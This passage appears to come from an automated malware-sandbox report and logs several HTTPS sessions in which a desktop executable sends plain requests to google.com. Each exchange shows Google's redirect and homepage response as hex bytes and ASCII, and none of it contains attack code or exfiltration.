                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CXK5K94LXXiJTpdS-gMwPA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.749703172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-cBffjmSrAHSHQjALd9zpPg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            6192.168.2.749708172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Pcd058H3Wj7Nziu-UV3XoA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.749707172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-HO90H8qxXDLkKuIMk5FKKA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            8192.168.2.749704172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-apI8TG9n_pIQGsr7CnAa1A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            9192.168.2.749712172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-ASftsaTlseXgKKxYJPGeCQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            10192.168.2.749709172.217.16.2064435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: google.com
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                            Location: https://www.google.com/
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-AcsSYVvZHLgS3DbdC-WL2A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:10 GMT
                                                                                                                                                                                                                            Expires: Thu, 13 Feb 2025 11:48:10 GMT
                                                                                                                                                                                                                            Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            Content-Length: 220
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            2025-01-14 11:48:10 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            11192.168.2.749716142.250.186.1004435472C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-01-14 11:48:11 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1195INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 14 Jan 2025 11:48:12 GMT
                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                                                                                                            Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Y0meWsYbmhG-6n9RjPePHw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            Set-Cookie: AEC=AZ6Zc-UYoS-2gNwzJIATWsMvRXVQEAyd5BZaVieTRtB0uaMFPx2LDaOp4yQ; expires=Sun, 13-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                            Set-Cookie: NID=520=ZtyWbdxGffOjIAtaVi62rmCR0jWYsVbG8R2_Tvl69c2NX4NZ9mtE3O2z-o3JeDCrfr6UOAg2BC9PtH9EpqM0R-8APu1B2y9XqY8nGVs6Jkf1vq3PxXmxxVN1btZC2lY-m1Aq-g9HFSdV46w0NzBY9K-1V3CkZi1aSJqI77K1TDhGgss8k9rpKwDRSA8UxcEFZI_LTJpkUtLvrQ; expires=Wed, 16-Jul-2025 11:48:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC195INData Raw: 34 64 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73
                                                                                                                                                                                                                            Data Ascii: 4d69<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61
                                                                                                                                                                                                                            Data Ascii: many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standa
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 37 39 31 2c 38 30 2c 34 39 35 2c 31 35 32 2c 33 36 32 2c 35 30 2c 32 33 35 2c 34 30 30 2c 32 2c 34 2c 32 32 2c 33 35 33 2c 32 2c 32 34 34 2c 31 36 30 2c 32 30 39 2c 33 33 31 2c 34 35 32 2c 31 34 32 2c 36 30 32 2c 35 38 2c 35 2c 31 37 38 2c 32 32 37 2c 36 39 32 2c 38 33 32 2c 32 35 37 2c 34 39 37 2c 31 38 32 34 2c 35 32 36 2c 36 35 39 2c 33 35 31 2c 31 38 37 2c 33 32 33 2c 31 37 2c 33 2c 34 32 32 2c 33 2c 33 35 35 2c 31 36 2c 31 37 34 32 2c 35 36 30 2c 33 35 31 2c 36 30 33 2c 37 33 2c 31 36 39 2c 33 2c 34 31 34 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 37 32 37 2c 36 34 36 2c 33 2c 32 31 39 2c 34 39 39 2c 33 30 38 2c 33 33 33 2c 31 36 2c 31 2c 31 2c 37 39 2c 33 30 37 2c 36 33 35 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 31 37 2c 32
                                                                                                                                                                                                                            Data Ascii: 791,80,495,152,362,50,235,400,2,4,22,353,2,244,160,209,331,452,142,602,58,5,178,227,692,832,257,497,1824,526,659,351,187,323,17,3,422,3,355,16,1742,560,351,603,73,169,3,414,1604,1,5,4,4,4,163,727,646,3,219,499,308,333,16,1,1,79,307,635,2,1,2,2,2,3,41,17,2
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61
                                                                                                                                                                                                                            Data Ascii: rn null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).ca
                                                                                                                                                                                                                            2025-01-14 11:48:12 UTC1390INData Raw: 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74
                                                                                                                                                                                                                            Data Ascii: this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;t
